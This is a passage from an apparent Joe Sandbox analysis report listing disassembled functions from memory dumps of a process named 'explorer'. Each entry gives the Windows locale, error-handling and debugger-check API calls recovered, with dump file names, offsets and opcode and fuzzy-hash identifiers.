                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 02F226D5
                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 02F226F4
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 949163717-0
                                                                                                                                                                                                                        • Opcode ID: b4ffa0dbd95ead38abe898d2cf4186ae719837024cda07b20e1b0a3e89b03917
                                                                                                                                                                                                                        • Instruction ID: 87fbafd2e3d2a2cd9dda7cb605cc0268b129f8c7f19f57ac78bc9fea59ce4b10
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4ffa0dbd95ead38abe898d2cf4186ae719837024cda07b20e1b0a3e89b03917
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28517472E00225ABEF20DFA5DC40BAFB7B9BF49784F444469EA14EB150E7709908CF61
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 02F0A1A1
                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 02F0A26D
                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02F0A28D
                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 02F0A297
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 254469556-0
                                                                                                                                                                                                                        • Opcode ID: 7ccecca0bc28423075382fe8ca17c058d30623cef87e2ddb4e736c8c5ab839c2
                                                                                                                                                                                                                        • Instruction ID: 819560034bcbaab3a81acf1fbf8727fedcd8614c85ab6a242607cc7719371401
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ccecca0bc28423075382fe8ca17c058d30623cef87e2ddb4e736c8c5ab839c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D311A75D4131C9BDB10DFA4D9897CDBBB8BF08344F1041AAE50DA7290EB719A859F44
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
                                                                                                                                                                                                                          • Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3
                                                                                                                                                                                                                          • Part of subcall function 02F16820: _free.LIBCMT ref: 02F16882
                                                                                                                                                                                                                          • Part of subcall function 02F16820: _free.LIBCMT ref: 02F168B8
                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02F2202F
                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02F22079
                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02F2213F
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: InfoLocale$ErrorLast_free
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3140898709-0
                                                                                                                                                                                                                        • Opcode ID: f00360b93d99b0c81eb05462c7193dd91f7eebda12545904599a09c33181b73d
                                                                                                                                                                                                                        • Instruction ID: af6f88ce1ff0135e9a0027de2ae4f0d6dd6cafdc53de0a3a24f3ab4378e808a0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f00360b93d99b0c81eb05462c7193dd91f7eebda12545904599a09c33181b73d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A861B171A401279FEB289F28CC82FBA77A9EF06380F104169EF15C6185EB74D999DF50
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 02F0E974
                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 02F0E97E
                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 02F0E98B
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                        • Opcode ID: 6ee862e6599d9ff1d53b2419f88ef819391ca1755f7e597b1448f4f7c6cfb98d
                                                                                                                                                                                                                        • Instruction ID: e49638d7bd744c71f761b472d49013b5db5ff912c18034bddb2e1583f9e1aaa4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ee862e6599d9ff1d53b2419f88ef819391ca1755f7e597b1448f4f7c6cfb98d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1631E674D0121C9BCB21DF68DC8879CBBB8BF08350F5045EAE50CA7290EB709B859F44
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 02F0A395
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2325560087-0
                                                                                                                                                                                                                        • Opcode ID: 7ca06757c54b0b729f209633600df473d32437bb5ff69c26bc74e3a86a08a731
                                                                                                                                                                                                                        • Instruction ID: b7f7b27f988a0589a69d6de5a83145711702b2637e0a308f4a7254b1c78556f7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ca06757c54b0b729f209633600df473d32437bb5ff69c26bc74e3a86a08a731
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6516EB9E01309CBEB15CF55D9C57AEBBF0FB54398F14882ADA05EB281D3B49950CB90
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: a2f7489a2aef375b30714f1ca6f9ddac13144c9b910b856f4337eeeb20c2f020
                                                                                                                                                                                                                        • Instruction ID: 37994d1afe21b4e337cf4aef50fb66a262c45ad2803755f1633673deaa6d304d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2f7489a2aef375b30714f1ca6f9ddac13144c9b910b856f4337eeeb20c2f020
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC41A0B1C0421DAFDB24DF69CC88AEABBB9EF45340F5442D9E95DD3240DA359E848F10
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
                                                                                                                                                                                                                          • Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3
                                                                                                                                                                                                                          • Part of subcall function 02F16820: _free.LIBCMT ref: 02F16882
                                                                                                                                                                                                                          • Part of subcall function 02F16820: _free.LIBCMT ref: 02F168B8
                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02F22282
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorLast_free$InfoLocale
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2003897158-0
                                                                                                                                                                                                                        • Opcode ID: 12a64d44b2f69dc89d0b09c297f463408950f31a785602745555420ca2539de8
                                                                                                                                                                                                                        • Instruction ID: edbc07556ec9e589525d1810a0db4efebd16ae63ce2f2adaa730f86df7f80c03
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12a64d44b2f69dc89d0b09c297f463408950f31a785602745555420ca2539de8
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92210432A10226ABEB189E24DC40B7A73ADEF46394B00017EEE01D6180EB75ED48DF50
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
                                                                                                                                                                                                                          • Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3
                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(02F21FDB,00000001,00000000,?,-00000050,?,02F22609,00000000,?,?,?,00000055,?), ref: 02F21F27
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                                                                        • Opcode ID: 0e5ee59f8c250f317caf1529e763a5989b4a645f3011d474e7ab675f9293bfc2
                                                                                                                                                                                                                        • Instruction ID: 186b8627b95a0d0e322177ec7710a0418996100a2a50676f7382abab81b2cb5c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e5ee59f8c250f317caf1529e763a5989b4a645f3011d474e7ab675f9293bfc2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 261106376007055FEB189F39889067BB7A2FF813A8B14442CEA4B87601D371B407CB40
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
                                                                                                                                                                                                                          • Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3
                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,02F221F7,00000000,00000000,?), ref: 02F22486
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3736152602-0
                                                                                                                                                                                                                        • Opcode ID: c55bf5be1020221766c538767ebd497341f78281a972593000ffb3f45fd8d693
                                                                                                                                                                                                                        • Instruction ID: e3cbe1d069897146cc080f81c97950eaeb38922a9545e0115d5bfb96a825bf0a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c55bf5be1020221766c538767ebd497341f78281a972593000ffb3f45fd8d693
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8EF0F932E00121ABDB289A28CD05BBB7759EB41798F054469EE05A7281DB74F905C9E0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
                                                                                                                                                                                                                          • Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3
                                                                                                                                                                                                                          • Part of subcall function 02F16820: _free.LIBCMT ref: 02F16882
                                                                                                                                                                                                                          • Part of subcall function 02F16820: _free.LIBCMT ref: 02F168B8
                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 02F21E17
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorLast_free$InfoLocale
                                                                                                                                                                                                                        • String ID: utf8
                                                                                                                                                                                                                        • API String ID: 2003897158-905460609
                                                                                                                                                                                                                        • Opcode ID: fe0274ba5534a90020e65ac2714fa6401c029fa6e9f2f1fcb86394e8dd62cae7
                                                                                                                                                                                                                        • Instruction ID: 995daef78139d07d3e5225e3cf6885fad4449b5158a1cde83390caa7454cce3c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe0274ba5534a90020e65ac2714fa6401c029fa6e9f2f1fcb86394e8dd62cae7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49F02832A40115ABD714AF74DC44EBB73EDDF493A0F00007EE606DB280EAB8AD05CB90
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
                                                                                                                                                                                                                          • Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3
                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(02F2222E,00000001,FFFFFFFF,?,-00000050,?,02F225CD,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 02F21F9A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                                                                        • Opcode ID: 4ded1d3ebf6754a3f21bca5839abddaf561077fe0c5a86ec249f4a10dcce3cfd
                                                                                                                                                                                                                        • Instruction ID: a36505020741d6a678609adaad6d170c1216838ed26aee24de562b5f3b058397
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ded1d3ebf6754a3f21bca5839abddaf561077fe0c5a86ec249f4a10dcce3cfd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2F0F636A003145FEB24AF759C84B7B7B96EF813A8F05452DFA098B680C772A846CA54
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02F12100: EnterCriticalSection.KERNEL32(-00047B11,?,02F13427,00000000,02F43028,0000000C,02F133EE,?,?,02F1A24D,?,?,02F169C2,00000001,00000364,00000006), ref: 02F1210F
                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(02F17EFF,00000001,02F43248,0000000C,02F1832A,00000000), ref: 02F17F44
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1272433827-0
                                                                                                                                                                                                                        • Opcode ID: 04392e55dbf9bfc7f5b307a8e1277a9f307deff3e2bc81ff8cbb5b1a84fb8be9
                                                                                                                                                                                                                        • Instruction ID: 77836308effeb1c17f8903eb10e17ec1bbcd77c91b207ffa6046bbf8595b80c8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04392e55dbf9bfc7f5b307a8e1277a9f307deff3e2bc81ff8cbb5b1a84fb8be9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FCF04F36A40204EFE700EF98D845B5DB7F1EB587A0F10451AE615AB290CBB549409F45
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
                                                                                                                                                                                                                          • Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3
                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(02F21DC3,00000001,FFFFFFFF,?,?,02F2262B,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 02F21EA1
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
